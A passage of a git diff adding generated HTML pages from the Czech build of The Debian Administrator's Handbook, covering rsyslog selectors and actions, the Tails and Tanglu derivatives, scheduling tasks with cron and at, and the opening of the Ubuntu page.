+                  class="replaceable">subsystem</em>.<em
+                  class="replaceable">priority</em></code> pairs (example: <code
+                class="literal">auth.notice;mail.info</code>). An asterisk may represent all subsystems or all priorities (examples: <code
+                class="literal">*.alert</code> or <code
+                class="literal">mail.*</code>). Several subsystems can be grouped, by separating them with a comma (example: <code
+                class="literal">auth,mail.info</code>). The priority indicated also covers messages of equal or higher priority; thus <code
+                class="literal">auth.alert</code> indicates the <code
+                class="literal">auth</code> subsystem messages of <code
+                class="literal">alert</code> or <code
+                class="literal">emerg</code> priority. Prefixed with an exclamation point (!), it indicates the opposite, in other words the strictly lower priorities; <code
+                class="literal">auth.!notice</code>, thus, indicates messages issued from <code
+                class="literal">auth</code>, with <code
+                class="literal">info</code> or <code
+                class="literal">debug</code> priority. Prefixed with an equal sign (=), it corresponds to precisely and only the priority indicated (<code
+                class="literal">auth.=notice</code> only concerns messages from <code
+                class="literal">auth</code> with <code
+                class="literal">notice</code> priority).
+				</div><div
+              class="para">
+					Each element in the list on the selector overrides previous elements. It is thus possible to restrict a set or to exclude certain elements from it. For example, <code
+                class="literal">kern.info;kern.!err</code> means messages from the kernel with priority between <code
+                class="literal">info</code> and <code
+                class="literal">warn</code>. The <code
+                class="literal">none</code> priority indicates the empty set (no priorities), and may serve to exclude a subsystem from a set of messages. Thus, <code
+                class="literal">*.crit;kern.none</code> indicates all the messages of priority equal to or higher than <code
+                class="literal">crit</code> not coming from the kernel.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.syslog-action-syntax"></a>9.5.2.2. Syntax of Actions</h4></div></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> The named pipe, a persistent pipe</strong></p></div></div></div><a
+                id="id-1.12.8.6.4.2.2"
+                class="indexterm"></a><a
+                id="id-1.12.8.6.4.2.3"
+                class="indexterm"></a><div
+                class="para">
+					A named pipe is a particular type of file that operates like a traditional pipe (the pipe that you make with the “|” symbol on the command line), but via a file. This mechanism has the advantage of being able to relate two unrelated processes. Anything written to a named pipe blocks the process that writes until another process attempts to read the data written. This second process reads the data written by the first, which can then resume execution.
+				</div><div
+                class="para">
+					Such a file is created with the <code
+                  class="command">mkfifo</code> command.
+				</div></div><div
+              class="para">
+					The various possible actions are:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							add the message to a file (example: <code
+                      class="filename">/var/log/messages</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							send the message to a remote <code
+                      class="command">syslog</code> server (example: <code
+                      class="literal">@log.falcot.com</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							send the message to an existing named pipe (example: <code
+                      class="literal">|/dev/xconsole</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							send the message to one or more users, if they are logged in (example: <code
+                      class="literal">root,rhertzog</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							send the message to all logged in users (example: <code
+                      class="literal">*</code>);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							write the message in a text console (example: <code
+                      class="literal">/dev/tty8</code>).
+						</div></li></ul></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> Forwarding logs</strong></p></div></div></div><a
+                id="id-1.12.8.6.4.5.2"
+                class="indexterm"></a><div
+                class="para">
+					It is a good idea to record the most important logs on a separate machine (perhaps dedicated for this purpose), since this will prevent any possible intruder from removing traces of their intrusion (unless, of course, they also compromise this other server). Furthermore, in the event of a major problem (such as a kernel crash), you have the logs available on another machine, which increases your chances of determining the sequence of events that caused the crash.
+				</div><div
+                class="para">
+					To accept log messages sent by other machines, you must reconfigure <span
+                  class="emphasis"><em>rsyslog</em></span>: in practice, it is sufficient to activate the ready-for-use entries in <code
+                  class="filename">/etc/rsyslog.conf</code> (<code
+                  class="literal">$ModLoad imudp</code> and <code
+                  class="literal">$UDPServerRun 514</code>).
+				</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.administration-interfaces.html"><strong>Předcházející</strong>9.4. Administration Interfaces</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.inetd.html"><strong>Další</strong>9.6. The inetd Super-Server</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.tails.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.tails.html
new file mode 100644
index 000000000..4b9be7b8f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.tails.html
@@ -0,0 +1,87 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.7. Tails</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.grml.html"
+        title="A.6. Grml" /><link
+        rel="next"
+        href="sect.kali.html"
+        title="A.8. Kali Linux" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.tails.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.grml.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kali.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.tails"></a>A.7. Tails</h2></div></div></div><a
+          id="id-1.20.10.2"
+          class="indexterm"></a><div
+          class="para">
+			Tails (The Amnesic Incognito Live System) aims at providing a live system that preserves anonymity and privacy. It takes great care in not leaving any trace on the computer it runs on, and uses the Tor network to connect to the Internet in the most anonymous way possible. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://tails.boum.org">https://tails.boum.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.grml.html"><strong>Předcházející</strong>A.6. Grml</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kali.html"><strong>Další</strong>A.8. Kali Linux</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.tanglu.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.tanglu.html
new file mode 100644
index 000000000..40fb14d78
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.tanglu.html
@@ -0,0 +1,89 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.10. Tanglu</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.devuan.html"
+        title="A.9. Devuan" /><link
+        rel="next"
+        href="sect.doudoulinux.html"
+        title="A.11. DoudouLinux" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.tanglu.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.devuan.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.doudoulinux.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.tanglu"></a>A.10. Tanglu</h2></div></div></div><a
+          id="id-1.20.13.2"
+          class="indexterm"></a><div
+          class="para">
+			Tanglu is another Debian derivative; this one is based on a mix of Debian <span
+            class="distribution distribution">Testing</span> and <span
+            class="distribution distribution">Unstable</span>, with patches to some packages. Its goal is to provide a modern desktop-friendly distribution based on fresh software, without the release constraints of Debian. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://tanglu.org">http://tanglu.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.devuan.html"><strong>Předcházející</strong>A.9. Devuan</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.doudoulinux.html"><strong>Další</strong>A.11. DoudouLinux</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.task-scheduling-cron-atd.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.task-scheduling-cron-atd.html
new file mode 100644
index 000000000..2d2deab2f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.task-scheduling-cron-atd.html
@@ -0,0 +1,395 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.7. Scheduling Tasks with cron and atd</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.inetd.html"
+        title="9.6. The inetd Super-Server" /><link
+        rel="next"
+        href="sect.asynchronous-task-scheduling-anacron.html"
+        title="9.8. Scheduling Asynchronous Tasks: anacron" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.task-scheduling-cron-atd.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.inetd.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.asynchronous-task-scheduling-anacron.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.task-scheduling-cron-atd"></a>9.7. Scheduling Tasks with <code
+                  class="command">cron</code> and <code
+                  class="command">atd</code></h2></div></div></div><a
+          id="id-1.12.10.2"
+          class="indexterm"></a><a
+          id="id-1.12.10.3"
+          class="indexterm"></a><a
+          id="id-1.12.10.4"
+          class="indexterm"></a><a
+          id="id-1.12.10.5"
+          class="indexterm"></a><div
+          class="para">
+			<code
+            class="command">cron</code> is the daemon responsible for executing scheduled and recurring commands (every day, every week, etc.); <code
+            class="command">atd</code> is that which deals with commands to be executed a single time, but at a specific moment in the future.
+		</div><div
+          class="para">
+			In a Unix system, many tasks are scheduled for regular execution:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					rotating the logs;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					updating the database for the <code
+                  class="command">locate</code> program;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					back-ups;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					maintenance scripts (such as cleaning out temporary files).
+				</div></li></ul></div><div
+          class="para">
+			By default, all users can schedule the execution of tasks. Each user has thus their own <span
+            class="emphasis"><em>crontab</em></span> in which they can record scheduled commands. It can be edited by running <code
+            class="command">crontab -e</code> (its content is stored in the <code
+            class="filename">/var/spool/cron/crontabs/<em
+              class="replaceable">user</em></code> file).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SECURITY</em></span> Restricting <code
+                      class="command">cron</code> or <code
+                      class="command">atd</code></strong></p></div></div></div><div
+            class="para">
+			You can restrict access to <code
+              class="command">cron</code> by creating an explicit authorization file (whitelist) in <code
+              class="filename">/etc/cron.allow</code>, in which you indicate the only users authorized to schedule commands. All others will automatically be deprived of this feature. Conversely, to only block one or two troublemakers, you could write their username in the explicit prohibition file (blacklist), <code
+              class="filename">/etc/cron.deny</code>. This same feature is available for <code
+              class="command">atd</code>, with the <code
+              class="filename">/etc/at.allow</code> and <code
+              class="filename">/etc/at.deny</code> files.
+		</div></div><div
+          class="para">
+			The root user has their own <span
+            class="emphasis"><em>crontab</em></span>, but can also use the <code
+            class="filename">/etc/crontab</code> file, or write additional <span
+            class="emphasis"><em>crontab</em></span> files in the <code
+            class="filename">/etc/cron.d</code> directory. These last two solutions have the advantage of being able to specify the user identity to use when executing the command.
+		</div><div
+          class="para">
+			The <span
+            class="emphasis"><em>cron</em></span> package includes by default some scheduled commands that execute:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					programs in the <code
+                  class="filename">/etc/cron.hourly/</code> directory once per hour;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					programs in <code
+                  class="filename">/etc/cron.daily/</code> once per day;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					programs in <code
+                  class="filename">/etc/cron.weekly/</code> once per week;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					programs in <code
+                  class="filename">/etc/cron.monthly/</code> once per month.
+				</div></li></ul></div><div
+          class="para">
+			Many Debian packages rely on this service: by putting maintenance scripts in these directories, they ensure optimal operation of their services.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.format-crontab"></a>9.7.1. Format of a <code
+                    class="filename">crontab</code> File</h3></div></div></div><a
+            id="id-1.12.10.15.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Text shortcuts for <code
+                        class="command">cron</code></strong></p></div></div></div><div
+              class="para">
+				<code
+                class="command">cron</code> recognizes some abbreviations which replace the first five fields in a <code
+                class="filename">crontab</code> entry. They correspond to the most classic scheduling options:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@yearly</code>: once per year (January 1, at 00:00);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@monthly</code>: once per month (the 1st of the month, at 00:00);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@weekly</code>: once per week (Sunday at 00:00);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@daily</code>: once per day (at 00:00);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						<code
+                      class="literal">@hourly</code>: once per hour (at the beginning of each hour).
+					</div></li></ul></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SPECIAL CASE</em></span> <code
+                        class="command">cron</code> and daylight savings time</strong></p></div></div></div><div
+              class="para">
+				In Debian, <code
+                class="command">cron</code> takes the time change (for Daylight Savings Time, or in fact for any significant change in the local time) into account as best as it can. Thus, the commands that should have been executed during an hour that never existed (for example, tasks scheduled at 2:30 am during the Spring time change in France, since at 2:00 am the clock jumps directly to 3:00 am) are executed shortly after the time change (thus around 3:00 am DST). On the other hand, in autumn, when commands would be executed several times (2:30 am DST, then an hour later at 2:30 am standard time, since at 3:00 am DST the clock turns back to 2:00 am) are only executed once.
+			</div><div
+              class="para">
+				Be careful, however, if the order in which the different scheduled tasks and the delay between their respective executions matters, you should check the compatibility of these constraints with <code
+                class="command">cron</code>'s behavior; if necessary, you can prepare a special schedule for the two problematic nights per year.
+			</div></div><div
+            class="para">
+				Each significant line of a <span
+              class="emphasis"><em>crontab</em></span> describes a scheduled command with the six (or seven) following fields:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						the value for the minute (number from 0 to 59);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the value for the hour (from 0 to 23);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the value for the day of the month (from 1 to 31);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the value for the month (from 1 to 12);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the value for the day of the week (from 0 to 7, 1 corresponding to Monday, Sunday being represented by both 0 and 7; it is also possible to use the first three letters of the name of the day of the week in English, such as <code
+                    class="literal">Sun</code>, <code
+                    class="literal">Mon</code>, etc.);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the user name under whose identity the command must be executed (in the <code
+                    class="filename">/etc/crontab</code> file and in the fragments located in <code
+                    class="filename">/etc/cron.d/</code>, but not in the users' own crontab files);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the command to execute (when the conditions defined by the first five columns are met).
+					</div></li></ul></div><div
+            class="para">
+				All these details are documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">crontab</span>(5)</span> man page.
+			</div><div
+            class="para">
+				Each value can be expressed in the form of a list of possible values (separated by commas). The syntax <code
+              class="literal">a-b</code> describes the interval of all the values between <code
+              class="literal">a</code> and <code
+              class="literal">b</code>. The syntax <code
+              class="literal">a-b/c</code> describes the interval with an increment of <code
+              class="literal">c</code> (example: <code
+              class="literal">0-10/2</code> means <code
+              class="literal">0,2,4,6,8,10</code>). An asterisk <code
+              class="literal">*</code> is a wildcard, representing all possible values.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.crontab"></a><p
+              class="title"><strong>Příklad 9.2. Sample <code
+                  class="filename">crontab</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">#Format
+#min hour day mon dow  command
+
+# Download data every night at 7:25 pm
+ 25  19   *   *   *    $HOME/bin/get.pl
+
+# 8:00 am, on weekdays (Monday through Friday)
+ 00  08   *   *   1-5  $HOME/bin/dosomething
+
+# Restart the IRC proxy after each reboot
+@reboot /usr/bin/dircproxy
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Executing a command on boot</strong></p></div></div></div><div
+              class="para">
+				To execute a command a single time, just after booting the computer, you can use the <code
+                class="literal">@reboot</code> macro (a simple restart of <code
+                class="command">cron</code> does not trigger a command scheduled with <code
+                class="literal">@reboot</code>). This macro replaces the first five fields of an entry in the <span
+                class="emphasis"><em>crontab</em></span>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> Emulating <code
+                        class="command">cron</code> with <code
+                        class="command">systemd</code></strong></p></div></div></div><div
+              class="para">
+				It is possible to emulate part of <code
+                class="command">cron</code>'s behaviour with <code
+                class="command">systemd</code>'s timer mechanism (see <a
+                class="xref"
+                href="unix-services.html#sect.systemd">9.1.1 – „The systemd init system“</a>).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.at-command"></a>9.7.2. Using the <code
+                    class="command">at</code> Command</h3></div></div></div><a
+            id="id-1.12.10.16.2"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="command">at</code> executes a command at a specified moment in the future. It takes the desired time and date as command-line parameters, and the command to be executed in its standard input. The command will be executed as if it had been entered in the current shell. <code
+              class="command">at</code> even takes care to retain the current environment, in order to reproduce the same conditions when it executes the command. The time is indicated by following the usual conventions: <code
+              class="literal">16:12</code> or <code
+              class="literal">4:12pm</code> represents 4:12 pm. The date can be specified in several European and Western formats, including <code
+              class="literal">DD.MM.YY</code> (<code
+              class="literal">27.07.15</code> thus representing 27 July 2015), <code
+              class="literal">YYYY-MM-DD</code> (this same date being expressed as <code
+              class="literal">2015-07-27</code>), <code
+              class="literal">MM/DD/[CC]YY</code> (ie., <code
+              class="literal">12/25/15</code> or <code
+              class="literal">12/25/2015</code> will be December 25, 2015), or simple <code
+              class="literal">MMDD[CC]YY</code> (so that <code
+              class="literal">122515</code> or <code
+              class="literal">12252015</code> will, likewise, represent December 25, 2015). Without it, the command will be executed as soon as the clock reaches the time indicated (the same day, or tomorrow if that time has already passed on the same day). You can also simply write “today” or “tomorrow”, which is self-explanatory.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>at 09:00 27.07.15 &lt;&lt;END</code></strong>
+<code
+              class="computeroutput">&gt; </code><strong
+              class="userinput"><code>echo "Don't forget to wish a Happy Birthday to Raphaël!" \</code></strong>
+<code
+              class="computeroutput">&gt; </code><strong
+              class="userinput"><code>  | mail lolando@debian.org</code></strong>
+<code
+              class="computeroutput">&gt; </code><strong
+              class="userinput"><code>END</code></strong>
+<code
+              class="computeroutput">warning: commands will be executed using /bin/sh
+job 31 at Mon Jul 27 09:00:00 2015</code></pre><div
+            class="para">
+				An alternative syntax postpones the execution for a given duration: <code
+              class="command">at now + <em
+                class="replaceable">number</em> <em
+                class="replaceable">period</em></code>. The <em
+              class="replaceable">period</em> can be <code
+              class="literal">minutes</code>, <code
+              class="literal">hours</code>, <code
+              class="literal">days</code>, or <code
+              class="literal">weeks</code>. The <em
+              class="replaceable">number</em> simply indicates the number of said units that must elapse before execution of the command.
+			</div><div
+            class="para">
+				To cancel a task scheduled by <code
+              class="command">cron</code>, simply run <code
+              class="command">crontab -e</code> and delete the corresponding line in the <span
+              class="emphasis"><em>crontab</em></span> file. For <code
+              class="command">at</code> tasks, it is almost as easy: run <code
+              class="command">atrm <em
+                class="replaceable">task-number</em></code>. The task number is indicated by the <code
+              class="command">at</code> command when you scheduled it, but you can find it again with the <code
+              class="command">atq</code> command, which gives the current list of scheduled tasks.
+			</div><a
+            id="id-1.12.10.16.7"
+            class="indexterm"></a><a
+            id="id-1.12.10.16.8"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.inetd.html"><strong>Předcházející</strong>9.6. The inetd Super-Server</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.asynchronous-task-scheduling-anacron.html"><strong>Další</strong>9.8. Scheduling Asynchronous Tasks: anacron</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ubuntu.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ubuntu.html
new file mode 100644
index 000000000..277401335
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ubuntu.html
@@ -0,0 +1,122 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.2. Ubuntu</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="next"
+        href="sect.linux-mint.html"
+        title="A.3. Linux Mint" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.ubuntu.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="derivative-distributions.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.linux-mint.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.ubuntu"></a>A.2. Ubuntu</h2></div></div></div><a
+          id="id-1.20.5.2"
+          class="indexterm"></a><div
+          class="para">
+			Ubuntu made quite a splash when it came on the Free Software scene, and for good reason: Canonical Ltd., the company that created this distribution, started by hiring thirty-odd Debian developers and publicly stating the far-reaching objective of providing a distribution for the general public with a new release twice a year. They also committed to maintaining each version for a year and a half.
+		</div><div
+          class="para">
+			These objectives necessarily involve a reduction in scope; Ubuntu focuses on a smaller number of packages than Debian, and relies primarily on the GNOME desktop (although an official Ubuntu derivative, called “Kubuntu”, relies on KDE Plasma). Everything is internationalized and made available in a great many languages.
+		</div><a
+          id="id-1.20.5.5"
+          class="indexterm"></a><div
+          class="para">
